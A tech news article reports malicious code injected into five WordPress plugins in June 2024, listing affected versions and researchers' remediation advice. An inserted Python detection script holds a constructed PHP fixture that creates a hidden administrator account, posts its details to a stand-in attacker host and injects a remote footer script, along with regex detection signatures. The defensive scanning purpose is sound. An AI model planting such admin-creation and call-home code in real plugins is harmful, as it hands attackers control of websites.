
Flaws in 5 WordPress plugins grant admin privileges to attackers


Several malicious code injections in five WordPress plugins were discovered on June 24, 2024, allowing attackers to create new administrative accounts and control the compromised website. The vulnerable WordPress plugins are Social Warfare, BLAZE Retail Widget, Wrapper Link Elementor, Contact Form 7 Multi-Step Addon, and Simply Show Hooks.

The initial flaw was observed on June 22 in the Social Warfare plugin, which has over 30,000 installations. Over the next couple of days, researchers discovered four other plugins with a similar flaw. Although the researchers notified the WordPress plugin team about these additional threats, there has been no official response, though WordPress has delisted the affected plugins from the repository.

Here’s a list of known compromised plugins and their respective patched versions:

| Plugin | Affected Versions | Patched Version |
| --- | --- | --- |
| Social Warfare | 4.4.6.4 to 4.4.7.1 | 4.4.7.3 |
| Blaze Widget | 2.2.5 to 2.5.2 | None |
| Wrapper Link Element | 1.0.2 to 1.0.3 | The latest version is tagged as 1.0.0; users are advised to remove it until a properly tagged version is released |
| Contact Form 7 Multi-Step Addon | 1.0.4 to 1.0.5 | None |
| Simply Show Hooks | 1.2.1 | None |

The injected malware is designed to create new administrative user accounts and relay their details to an attacker-controlled server. Additionally, malicious JavaScript is embedded into the footer of compromised websites, distributing SEO spam.

The malware’s simplicity, its lack of obfuscation and its commented code made it easy for researchers to trace. The earliest detected injection dates back to June 21, and the malicious code is still being updated continuously.

Researchers have advised users to check and delete any unauthorised WordPress administrative user accounts, run a malware check, remove any malicious code and update to safe plugin versions.

“If you have any of these plugins installed, you should consider your installation compromised and immediately go into incident response mode. We recommend checking your WordPress administrative user accounts and deleting any unauthorised ones, along with running a complete malware scan with the Wordfence plugin or Wordfence CLI and removing any malicious code,” said researchers.
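The two checks the researchers recommend (looking for unauthorised administrator accounts and scanning plugin code for the injected behaviour) can be scripted. The following is an added example, not code from the article or from Wordfence; the admin-list JSON and the plugin source are constructed fixtures shaped after the behaviour the article describes, and the `wp user list --format=json` field names are an assumption about WP-CLI output.

```python
import json
import re

# Constructed fixture: shape assumed for `wp user list --role=administrator --format=json`.
ADMIN_LIST_JSON = '''[
  {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.com", "user_registered": "2021-03-02 10:11:12"},
  {"ID": 57, "user_login": "wpsupp-user", "user_email": "x@example.invalid", "user_registered": "2024-06-22 03:14:05"}
]'''

# Constructed plugin source illustrating the behaviours the article attributes to the
# injected code (admin account creation, call-home, footer script). Not the real payload.
PLUGIN_SOURCE = '''<?php
add_action('init', function () {
    $uid = wp_insert_user(array('user_login' => 'wpsupp-user', 'role' => 'administrator'));
    wp_remote_post('https://attacker.invalid/collect', array('body' => array('u' => $uid)));
});
add_action('wp_footer', function () { echo '<script src="https://attacker.invalid/s.js"></script>'; });
'''

# One regex per capability described in the article; all are standard WordPress API names.
SIGNATURES = {
    "creates_user": re.compile(r"\bwp_(insert|create)_user\s*\("),
    "grants_admin_role": re.compile(r"['\"]role['\"]\s*=>\s*['\"]administrator['\"]"),
    "calls_home": re.compile(r"\bwp_remote_(post|get|request)\s*\(|\bcurl_init\s*\("),
    "footer_script": re.compile(r"add_action\s*\(\s*['\"]wp_footer['\"]"),
}

def unexpected_admins(admin_json, known_logins, since):
    """Return admin logins that are not on the allowlist or were registered on/after `since`."""
    return [u["user_login"] for u in json.loads(admin_json)
            if u["user_login"] not in known_logins or u["user_registered"] >= since]

def scan_plugin_source(src):
    """Return the sorted names of signatures that match the plugin source."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(src))

def risk_verdict(src):
    """Flag only when user creation and an administrator role grant appear together,
    so a plugin that merely hooks wp_footer is not reported."""
    return {"creates_user", "grants_admin_role"} <= set(scan_plugin_source(src))

if __name__ == "__main__":
    print(unexpected_admins(ADMIN_LIST_JSON, {"siteowner"}, "2024-06-21"))
    print(scan_plugin_source(PLUGIN_SOURCE), risk_verdict(PLUGIN_SOURCE))
```

The registration-date cut-off uses June 21, the earliest injection date the article gives; adjust the allowlist to the accounts you actually provisioned.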

At the start of this month, a critical arbitrary options update vulnerability was discovered affecting 40,000 websites. In May, three WordPress plugins were found to be affected by severe flaws.

A LayerSlider bug was discovered in May, affecting more than a million WordPress websites.


Kumar Hemant


Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me
